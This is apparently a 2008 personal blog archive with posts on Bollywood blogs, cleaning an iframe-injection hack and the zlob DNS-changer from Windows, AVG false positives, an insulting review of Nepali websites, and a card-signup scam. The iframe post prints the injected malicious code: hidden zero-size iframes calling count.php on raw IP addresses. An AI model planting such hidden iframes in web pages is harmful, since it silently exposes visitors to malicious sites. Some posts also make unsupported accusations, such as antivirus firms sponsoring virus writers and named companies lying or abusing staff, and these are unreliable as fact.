After a long hiatus, I've decided to make a comeback and be active on blog that I started as a hobby. This blog is right now going through major overhaul. I apologize for any undesirable function of the site. I'm eagerly active to complete the overall structure of the site. I want to thank Ashish Singh, our contributor for actively pumping life on this blog.
Wednesday, November 26, 2008
Let's start with
1. Aamir Khan's blog: This blog is all about Aamir Khan's personal ramblings. It's pretty interesting to read what's going on his world. You'll be greeted with his masculine gangsta physique pose with two links down right. Chat is not working when I tested cos it took forever to connect whereas his blog is simply neat. Not recently updated though.
2. Salman Khan's blog: This blog is not all about only Salman Khan but definitely it's authored by him. Erratically, this blog has strange name '10 ka Dum' which I think is some sort of Television program that he's anchored. It's centered around the program and lil bit of himself. It's hosted on blogspot. Not recently updated.
3. Amitabh Bacchan's blog: This blog is very nicely designed and updated frequently. You'll be welcomed by his mesmerizing smile at first visit to his blog along with the chronologically listed blog titles which is very alluring to read on. This blog reflects the very personal side of this greatest bollywood star ever born. It's fun and exciting to read his words.
As for other actors like Sharukh Khan,Hritik Roshan etc. they don't have any intention to fall into blogging world for now.
Thank you for reading my words.
<iframe src="http://188.8.131.52/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://184.108.40.206/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
The ill-effects of this scripts are as follows to my understanding:
-steals your traffic(even if you've high traffic, search engine might consider you as an idle site)
-steals information of your customers on dynamic websites if infected.
-redirects to malicious sites on worst cases.
-extremely slow load-ups of websites.
-Search Engines might block your website for ever to be listed on their directories
This code was injected on every main page of my websites. I called back to my webhost company and they suggested me that they are fighting with this issue more than me. They told me the only resolution is to nuke the entire account settings including databases/folders/etc and recreate everything. I didn't agree.. "You wouldn't kill a person in a name of curing his disease."
After searching a while and talking to so-called php guru, I tried
Global_register = OFFfrom "php.ini" so as to stop the php code execution automatically. But that again shut down some of my sites which was inoperable without turning
I manually deleted the remnants of that script so far I could. For sometimes, I thought it went away but deep within, I was sure that I didn't remove them all. Few weeks later, it was Hem's message that confirmed that my site is infected. He wrote that my personal blog was blacklisted on Google's Chrome for possible malicious site. I checked my other blog too. It was also blocked by Google's Chrome. Now, that was alarming for me. It looked something like this:
I was upset because I couldn't put my time on resolving this issue. I was way busy than I thought. After a month or say, I took time and sat in front of my computer to fight this problem. When I searched online for this particular issue, nobody had any solid solution except their mere high-tech ramblings and nothing else. I found my own simple ways to remove this iFrame hack problem.
Followings steps show how I removed the iFrame Injection off my websites:
1. First off, change all the passwords of hosting accounts, including the blog's admin passwords and so. I used https://www.grc.com/passwords.htm to generate hack-proof passwords. Took a bit out of it, somewhere else saved it. Next on, just copied/pasted the passwords whenever needed. Don't need to type all those weird characters at all.
2. Some said, the injection could've altered the databases. They suggested me to drop all the databases. I didn't believe them. I went to my hosting's PhpMyAdmin and ran a search query on entire databases. My search term was 'iframe' and other possible keywords. I didn't find any traces at all. You can 'Skip' this Step 2 if you don't know how to do that.
3. Next, I downloaded "Actual Search and Replace". Installed it. This software is for searching certain phrases irrespective of any file types and modifying them as per needed. Just as it's name suggests, search and Replace.
4. Now is the crucial part. FTP your accounts and download all possible infected files/folders off your host. Once you finished downloading them all and saved somewhere in your harddrive, run 'Active Search and Replace'. This is much much powerful than Window's Search or built-in Find feature. As soon as, you run this program, you'll know what to do next. Give the phrase as 'iframe', locate the location of downloaded Folders, and click 'FIND'. You'll see all legit/illegitimate entries. Most of the files it infected were as:
and some obnoxious file names..
Check all those suspicious files in your favorite HTML editors. Narrow your search in 'Actual Search and Replace'. Once confirmed, replace them all with nothing. Or to be on safe side, I actually edited them all one by one in Dreamweaver and deleted manually. Just in case not to remove the legit iframe codes from my html/php files. After I was done(took more than 4 hours), I re-uploaded all of them back to where it was before.
Next on, I didn't see the iFrame Injection coming up automatically as soon as I refreshed my pages. Press Ctrl+F5 for fresh reload of your web pages. This method of removing this malware is safe and solid. It helped me to remove this iFrame Injection off my websites. I'm confident because it's Day 29 after the successful removal of this iframe Injection.
I didn't see this solution anywhere on Internet. All php Gurus and experts suggested me to delete the entire system settings which I don't think is reasonable enough.
Note: Upon little research, I found this hack is originated from some part of the Russia but I found some script kiddies from Malaysia seemed using this hack on my servers. Many big corporate sites seemed affected with this problem and god knows how those security experts might have charged them in the name of remedy of this problem.
Thank you for reading my post.
Friday, November 21, 2008
ahem, the saga continues below:
Thank you for reading my post.
Thursday, November 20, 2008
All other security software companies are shaken with this news as they fear that they gonna loose their market shares. By the time, Microsoft release this software as free, I'm pretty much sure, other companies would be suing Microsoft. There are so many software companies which consider Microsoft as evil because Microsoft always tried to embed everything to it's operating system to make it perfect operating system. And they don't like it when Microsoft takes all their jobs. These are the same people and their forums are filled with hatred and induce people to prove it as the most vulnerable operating system in the world. To be true, many virus writers are targeted to exploit the Vulnerabilities in Microsoft windows than any other operating system. Sometimes, I think that these virus writers are the appointees of McAfee, Symantec, Linux,Mac.. in a way hoping to generate ongoing income for ever. "You create virus, we'll create antivirus?" Otherwise, why would I(if were a programmer)spend my time writing a virus? Gimme one reason. Today nobody spend a time for free. Gone are the days to do this kind of stuffs for name and fame. My point is there is a lot to suspect that these Antivirus Companies are the guardian of Virus writers. Whatever,with Microsoft's announcement, there is a kind of strange buzz all over the web.
One thing I don't understand why Microsoft is giving away it's paid Software as FREE? What could be the reason behind that? How those customers who paid for it would feel?
I'm waiting for coming days to find these answers and to test-drive Morro.
Thank you for reading my words.
Monday, November 17, 2008
Recent experiences with AVG antivirus is not good enough to believe it as a dependable antivirus software. It's not that old when AVG started to detect ZoneAlarm Firewall as a Trojan by the name of Agent_r.CX. What on earth guys behind AVG were thinking. Their definition files were tagging legit softwares as malicious.
On similar story, AVG antivirus detected user32.dll as a Trojan horse file and prompted to delete it. When deleted, it rendered their system unbootable. How the heck did they(AVG) not know that user32.dll is crucial file to have GUI in our system.
Now, this has happened to me a day ago, when, I tried to install flash player plugin for newly installed system(since firefox doesn't come loaded up already with that), it gave me a red warning on it. I double checked the adobe's site from where I downloaded and checked the file's properties. My Conscience told me nothing is wrong. I didn't care and installed the flash player plugin despite AVG's warning. Though I could see, AVG has renamed it to different file name. I don't know whats' cooking up on their side. Flash player is a must plugin for browsing.
The same issue that I(may be other thousands too) had few days ago hit this morning as news headlines;AVG identified install_flash_player.exe as PSW.Generic6.AQPD trojan and urged to delete it. That's one of the lamest antivirus warning.
All these issues were once discussed on their forum and, mysteriously all those posts and queries have been deleted by their moderators.
In regards to these responses, AVG says "AVG Technologies has immediately acted on a situation in which a limited number of consumers using AVG’s free software experienced a false-positive warning when downloading the latest Flash player update"
and adds "a replacement update within three hours of the original update and users are reporting no further problems. The company continues to institute new and increasingly rigorous quality-assurance standards to ensure that any potential vulnerabilities in future product updates are identified and eliminated before they can impact users." src
So, lets keep their clarification aside and think Is It time to switch to new one??
Thank you for reading my post.
Yesterday, I was working on a client's computer, it was new machine with no operating system. He had his legit copy of microsoft windows and I had to make more things work than just installing Microsoft Windows. It was the search for drivers and stuff like that plus couple of things to be tweaked according to his wish. I got the box and started working on it. Installation finished, all drivers loaded from various sources online and I was about to check some stuffs on Google. But as soon as I clicked some search links, it took me to some strange websites, most of them were so fake and seemed advertisement. Within that less than 15 minutes period of being online, the operating system was compromised. It was infected. It was my bad, that I forgot to load security softwares first.
Now it was pretty hard for me to bust that virus. I checked hidden startups on 'msconfig', checked running processes on task manager, but couldn't get any clue. I tried installing free AVG antivirus off the grisoft.com, but at the last moment of installation, AVG simply refused to get installed. I quickly installed Spybot Search and destroy, ran it quickly to check problems. Meantime, I downloaded Ad-Aware and installed and ran that too. Both of them, detected and tried fixing it. Looked like they fixed it. But the very next moment, virus got activated.
The computer I worked on was infected with some "zlob.dnschanger.rtk" and "resycled boot.com". That's what I saw on Spybot's result. I saw Zlob.dnschanger.rtk at first and later I found "resycled" wrongly spelled folder on every drive's root followed by a link to Autorun.inf and the program associated with it called boot.com
Believe me, this was the hardest malware that I've found till this date. I ran Hijack This, checked the process and actually found the suspicious one, but It wouldn't also delete that. It looked like it deleted but very next moment, running 'scan and save log', I could see the same thing popping up. Actually, "Hijack This" is considered a last resort to kill malwares. In my case, it failed too. I dived into registry, manually tried to remove the entries. It pretended it deleted but very next moment, it came back again. So, to me I compared the situation with Hindu mythology like where 'RAWANA's Head' popping up every time the LORD RAMA's arrow beheaded it's neck. Ummmm... All these things took more than an hour and I thought it's not wise to spend this much time to freshly installed system. My second thought was to nuke the Operating system and re-installed Windows again.
I've a strange itch to play with malwares, actually, I've a separate pen drive for that same purpose. I inserted my pen drive, loaded couple of things and the next moment, I could see 'resycled' folder on my pen drive. I successfully transferred the culprit to my pen drive. I formatted the computer and re-installed everything once again. This time, I loaded all the needed security softwares like AntiVirus,Firewall, Anti spywares etc. I loaded drivers and finished the system quickly.
This morning, I turned on my computer, where I've a sandbox system setup which is actually Operating System inside Operating System. If you know anything about VMware Virtualisation, then you know what I'm talking about. We call it sandbox. Anything you do inside that Virtualized Operating system, it's not gonna hamper the real operating system outside. The inside Sandbox system was Windows XP too. It was unprotected to be true. I quickly inserted my pen drive and ran something off there. After few seconds, I could see 'resycled' folder on my virtualized operating system. It was time for me to see how it's working. This is one hellava crazy virus which is doing more than one thing.
Some of the properties of this virus zlob.dnschanger.rtk(there are many many variants of this culprit) on my system:
- It changed my secondary DNS. That means, every time some dead link is found, it took me to somewhere else(some strange website with no page found message) instead of same old regular 'Address not found' page. That means, every time we send or request pages, it'll be parsed from that Odd DNS server. In other way, they'll read whatever we send out information from our computer.
- All the search result links of Google Search when clicked were re-directed to somewhere else than the destined links. Most of those links were purely looked advertisement and malicious. You'll go mad in situation like that. It looks like they want to make some money off us. The only solution I found for that time being is to copy the link and paste it manually on the address bar and hit the Go button or Enter key to prevent oneself going to malicious sites.
- It's deep rooted in the system and the process that it runs is also hidden. I tried to find the suspicious process using Microsoft's Process monitor but I gave up when I saw more than 64,000 processes running. Windows' default task manager is defunct in this case.
- It massively uses CPU's resource. As you go on surfing net, your computer slowly gives up till it becomes unresponsive meaning HANG..
There might be some other properties of this virus, but these are what I experienced. Other than that, while eradicating this thing, I found it's leaving it's traces all over the drive's root. Double-clicking any of your drive would technically hang your system. I had to right-click and select explore to see stuffs in my drive's root. That's how I saw strange folder 'resycled' and figure that it's actually the remnants of this zlob virus.
There is an effective way of removing zlob.dnschanger.rtk, resycled folder and boot.com
This virus deleted Spybot search and destroy on next restart. It didn't let AVG antivirus to be installed. Upon researching from my other computer, I found some tools to deal with this virus. Like ComboFix and Malwarebytes' Anti-Malware.
I first tried ComboFix. ComboFix didn't solve the problem. Malwarebyte's Anti-Malware was only hope, I ran it and to my wonder, It solved the problem.
Here is the step by step instructions how to remove this particular virus.
1. Since this is generating Autorun.inf Virus on every root drives, first disabled the autorun feature of your operating system.
a. Click Start-->Run
b. type 'gpedit.msc' for group policy editor(it's only in Windows XP PRO)
c. Under both Computer and User configuration, click->Administrative Templates->System
d. enable 'Turn off Autoplay' and select all drives. (you'll know when you reach
that screen, for now don't worry)
This will help prevent the virus to self trigger every time we clicked the root drive. I want you to set this option for your all computers, as most of the virus these days are triggered from the AUTORUN feature of windows.
2. Turn off the System Restore for now. Right Click 'My Computer' -> select properties -> 'System Restore'-> and select option for 'Turn off System Restore'. Click Ok-Ok when needed.
3. Click Start->Run-> type 'msconfig' and hit Enter key. Click 'Startup' Tab. Remove all suspicious startup stuffs from the list. Uncheck where needed
4. Download Malwarebytes' Anti-Malware. Install it and run it.
5. Malwarebyte's Anti-Malware detected virus and I saw something like this below in my case:
6. As soon as you see this screen above, select all those Check boxes next to red lines and click 'Remove Selected'.
7. During the removal process, you might see the screen like this below:
It's asking you to restart. Restart the system, as it needs to update the DNS settings and refresh the memory. That's it.
Next restart will be your virus free computer. Now, install all that security softwares in your safebox. Happy virus-free computing.
Thank you for reading my post.
Friday, November 14, 2008
This article is purely based upon my research and hereby want to clarify there is no egoism and vengeance involved. I read other hundreds of links to confirm and support my verdict on the 'Top 7 Worst Websites in Nepal'.
Anyone affiliated with the following websites should take it as a measure of improvement and constructive criticism rather than fuming on what's written here.
Lets start with something as an example to make you understand what the theme of this post is. Check this out: www.ikissyou.org
Once you checked the site, you must be thinking "what's so special out there?". Lemme tell you, the Turkish guy Mahir Cagri on that site is 'Cyber Celebrity' and the credit goes to his awkwardly designed site ikissyou.org. Once his site broke record of millions of hits a day, I don't know how. Despite his degraded English written on his site, it was so popular during 1999. I don't know how. Ever since, he has been interviewed numerous times in medias. Even on their national/international TV channels, I don't know how. His eccentric website gave him name and fame. This is my theme for today. I'm talking about some of the worst yet notoriously popular sites originated from Nepal. I call them luck-favored, fluke winner.
I, hereby, starting my article's main nugget.
1. mysansar.com : You must've heard an urban saying, 'Many people read craps, many people do craps,many people eat craps'. Well this site is one of the blogs if you've read, then is crap. The author has self-proclaimed testimony awarded to him by himself as the first blogger of the First Nepali blog in Nepal. To your amusement, he is in a strong jest to prove all his readers not a reader but bunch of fools and douche bags. Look at his blog Title, 'This is not a news site, it's blog'. He thinks readers can't differentiate between news and blog articles. He delivers news all the time through his blog, yet his blog headers sound different and hilarious. I've chuckled many times on this stupidity, but not any more, I'm used to it.
According to some sources, his blog's popularity picked up during people's revolution which threw away King's throne in vain. He then posted pictures of clashes and fed news hungry Nepalese living abroad with prompt news and latest pictures. But it's cynical on his self-claiming that his blog is Nepal's first blog in Nepalese language. To my knowledge, I was reading other Nepalese blog and sites before his blog. Obviously he is truly a big time liar.
The guy who expects to be the author of the first Nepali blog, has actually started his blog's title in English alphabet. Isn't that way hypocritical? On top of his posts based upon politically biased news and informations, he also backed baseless facts like 'Peepal-leaf powered Cellphone', he dishonored the benefits of VOIP, a latest and vibrant technology in use today. There are so many other posts where he falsified many facts and forced people to believe his saying. Truly, this blogger is out of mind stupid who curses his employers, advertisers and yet notoriously popular. I wouldn't say Mysansar.com sucks directly but the reality is his site gets thousands of hits a day.
2. nepalnews.com : More than 7 years ago, Mercantile started a simple sister site called nepalnews.com for publishing news online. Mercantile is one of Nepal's old Internet Service Providers. The CEO of Mercantile thinks himself as Bill Gates of Nepal. When people of Nepal were getting a word or two about Internet, they started their news site. Nobody had dared to start a site because it was way expensive then. It was only to someone's reach like big organizations or richy rich person. Starting website was of great respect and almost unimaginable for ordinary people. Mercantile instead of removing that disbelief, increased the gap. They charged people with high rates for their services. They didn't do anything to ease rather proved the technology as the most expensive thing after GOLD. While reading news about then India's progress on IT always envied me.
What started as a simple news publishing site is now more uglier and cluttered than ever. They bear a reputation of being Nation's only site which started delivering news but look at their sites security. This site has been hacked several times. Ever since crackers hacked into their boxes and wiped out entire video collections relevant to their news, they are now hosted on YouTube. They don't hire skilled manpower to safeguard their online services.
You can find several grammatical errors, poorly written articles and unstructured content and dead archives. This is not a personal site, it's read nationally and internationally. They should've considered on that.
On other note, this site is visited tremendously everyday and I wouldn't say nepalnews.com sucks.
3. muncha.com : This is Country's old online shopping store. Actually, munchahouse.com was later on superseded by muncha.com, short and sweet name.
It became more vague, cluttered and mismanaged. They targeted rich and content buyers by charging more on their products. Online purchasing is usually cheaper than real-life business. On the contrary, muncha.com sells more expensive stuffs and it seems they rarely update their price listing. When they deliver/ship the product, there is delivery charge which is hidden and unknown to buyers. This site is a total disgrace to be the nation's one of the online shopping stores. The pricing is astronomical and unbelievable. Yet, it's one of the most talked and visited sites.
4. yomari.com : Yomari is one of the oldest web solution providers meaning, they build websites, help creating MIS services, data mining etc. They've big names under their clients according to them.
If you've eagle-eyed on their latest Site where they've stated, they founded their company in 2004 which is actually a big lie. In fact, this company has been into existence since 1998. During this period, they've managed to grab many opportunities to create websites of private companies and government. If you've seen Nepal's government sites being hacked by Iranian crackers and ever wondered who might have finished those sites, well it's YOMARI. Their websites are the most hacked, unsecured and unreliable.
As one report stated, their management is also filled with self-centered and abusing officials. If it were in USA, one might have already pressed charge against them but that is Nepal. They are very notorious for employee abuse.
If you are planning to buy their services, I want you to read this thread below:
Yomari abuses it's employee unimaginably
You don't wanna get services from a company which is dictatorial to it's employees and unaccountable to it's clients. Yet, this is the most sought after web company. It's employees think yomari.com sucks bigtime.
5. sajha.com : This is one of the ugliest Nepalese websites I've ever seen. It is atrociously cluttered and hard to navigate, improper design and very grotesque.
The navigation is so cluttered that it looks like somebody might have spit with disgrace. Whoever has designed this site, I compare it with his mind's structure.
Other than that, this site is extremely inclusive and it has everything of interest to read on. It has live forum,chat,photo albums, everything to spend good time upon.
This is another massively visited site. But I never pay first visit on this site except some search engine result pages pointing to this site.
6. nepalvista.com : This is one of the oldest sites which specifically reviews Nepalese websites and awards them with it's own Badge. Way back, when bloggers asked this site to review their blogs, they denied simply because they didn't know about blogs. Irony, they've their own blogs now a days. They started reviewing blogs too. Hilarious but the truth.
The problem with this site is it doesn't do good reviews. They are focused on biased and emotional reviews. Many of their 'Site of the Month' or 'Site of the year' are dead and they don't really care to weed it out. So, this proves how immature their reviews are and how unprofessional their awards are which they keep doing on mushrooming sites without much research. I've already mentioned they do this biased and emotional.
Other than that, I wouldn't say Nepalvista.com sucks. Yet it's one of the most visited sites during it's time. You can still find collection of Nepalese site listed, don't go for their reviews though.
7. thamel.com : This site used to look good. It does,according to it's domain name, sound like it's only about Thamel, but that's not. I would tag it as a chameleon. I've been seeing this site changing it's color and service all the times. Few years ago, It looked like an online stores, sometimes it looks like Gift store, now a days you can see they are offering loan to NRN(Non-Resident Nepalese), dead link to their so called online banking.. Yeap, so much hiccups to get their services. What would you do, if you sent money and the next day, their link was dead from where you sent money?
One of my readers told me, that he tried to send money through thamel.com but later had to end up arguing to get his money back. He almost lost hope for his money because neither receiver received money and nor he's properly informed. Their customer support, I guess, is horrible.
Other than that, it's one of the most visited sites in Nepal. May be because it's the only place in Nepal where Tourists flock at first as soon as they come to this country. Back to their homes, their memories from Thamel must excite them to type thamel.com instinctively.
This ends my reviews on the worst and notoriously popular Nepalese websites. If you guys have anything to share more on this, I'll compile and constantly update this article giving due credit to your words.
Thank you for reading my post.
It had really become so much of concern for someone like me who went unaware of this fraud. I called ReservationRewards.com this morning, and I got reply from energetic young voice. She told me about the merchant company where I did business in past. Ummmm.. Geeks.com, I used my credit card there but how the heck did they got my info. She told me that they have tied up with that company like in a partnership. Then I remember of the fabulous offer they showed me as soon as I finished online purchase at Geeks.com
They needed me to sign up, I did with my email address and so. I never knew that they would charge my card because they never told me about that. It was total rip-off,I got tempered, and yelled at her. She got silenced, I thought she dropped the call, it's moment later she responded when I said 'hellllooooo'.
Bottom line: This company was listed under the name:Reservation Rewards. Though I had hard time trying to get answer why they charged my credit card without my consent, they seemed filled with guilt, and the answer wasn't that satisfactory and certainly refunding me stopped further discussion between us. I asked my bank to stop any payment request payment from this company in coming days. They did. Problems looked solved. Later I searched on this company and somehow I figured out that being member with them, one is going to get some sort of discount on doing business with their referred businesses. Had they not hidden me the fact that they are going to charge me, I wouldn't have signed up at first place and secondly written this article. I strongly advise Reservationrewards.com to be upfront, not to conceal what their motivation is and not to steal people's money silently.
My urge to my readers is do not ever sign up for any offers with your emails on internet as soon as you make some purchase using your credit card. These shameless online merchants are selling our infos to third parties. Geeks.com really didn't respect my confidential data that I've shared with them. And, in coming days, I'm not gonna refer this company to anyone. But I think it's just the awareness that comes after stumbling. I'm sharing my story. Beware!!!
Wednesday, November 12, 2008
Welcome to the world of the Chain Mails. ummm emails. Whoever sends you such email, their only intention is to clutter the bandwidth, back the Urban Legend, or to kill their worthless time to have some fun fooling around with innocent people out there, just like you and me. Well, I'm not that innocent in terms of computing stuffs otherwise, I wouldn't be writing this article who is telling you one or two things about chain mails.
Every time, you get chain mail, the subject of the email is usually followed by.. "FW: FW: Something something blah blah.. "
The only thing to do is to select it and hit that delete link in your inbox. But, if email is so tempting, there is no harm reading it and trashing. I often found that once some people read such emails, and they do forward without a second thought. When I asked them why would they do it, the answer leads me to some sort of social engineering being used. If you are scared of the consequences which these emails threaten you about and quickly forwards them to all in your contact, then I remember a story about a crackpot, you don't need to find him , just go in front of the mirror, THAT'S YOU. Don't be a crackpot, don't care about such chain mails at all. They are not gonna do any harm to you. This is a proven experience. I often get such emails from my contact list, if interesting, I read them but as soon as I see somewhere in the end, there is some sort of message which might be scary at first, like, "if you don't send email to at least 10 people, you'll have bad things happening within 24 hours, " or " if you don't forward, the curse will be upon you " or " if you don't.... someone near/dear will die"...
These people are taking advantage of your goodwill, your innocent instinct, and unnecessarily misusing the bandwidth, wasting your time and once again proving, that you are a big LOSER, FOOL of the Fools. These people make fun of themselves.
Lemme tell you my story, these emails have reached me in different flavors. Some were religious, some were very funny and some were scary stories, some were as lucrative as it could let you feel a millionaire for one second,and if you are Fool enough, you might have that feeling for some days or week before it's shattered to pieces. My point is don't follow them what they say. Just read and trash it. That's it. No harm is going to happen to you or you are not going to loose anything.
If you ever receive any of such so convincing hoaxes/chain emails, try to search it online first. Try the search with the exact email's subject key phrases. Believe me, you won't regret. You'll be astonished to see the results out there.
Furthermore, you can have a look at www.snopes.com which is deliberately dissecting all those lies,hoaxes,rumors and urban legends. Take your time sometime, and read this site.
Make this habit, you'll be happy. Don't be fool, don't get scared of such intimidation that you read, don't worry about the consequences, believe in yourself, be logical and one day, there will be no chain mail.
I've found a video on YouTube, this guy looks utterly annoyed by chain mails, and I could see his frustrations and cussing on this video below about chain mails. Check out what he's to say about chain mails(mind his cussing):
So, this post is all about not getting paranoia, frustrated or scared after you read/get them. 'Chillax' and enjoy your precious time.
Thank you for reading my post.
Monday, November 10, 2008
Circuit City will open till Sale this upcoming holiday season but before that it has announced that it'll cut off more than 700 jobs and laying off thousands of employees.
Once I stopped by Circuit City here in Santa Cruz, and checked some of their gadgets. It was way higher than on Internet. Though, Santa Cruz is notorious for expensive stuff and living, at least I had thought it wouldn't be the case with electronic stuffs. I just did window shopping and ordered things from online at lot cheaper price. I was wondering how these companies are sustaining, then I made second thought, may be consumer are so naive.
I obviously blame this for the bad economy. People are almost unwilling to spend a penny on fancy stuffs than necessity in this worst economy condition.
Thank you for reading my news.
Sunday, November 09, 2008
This is a very funny animated AD based on notoriously popular character Gabbar Singh of 'SHOLAY', the biggest hit in indian film history. If you don't relate to hindi movies, skip the video and observe some of these pictures(click 'em for full size)
Thank you for reading my post.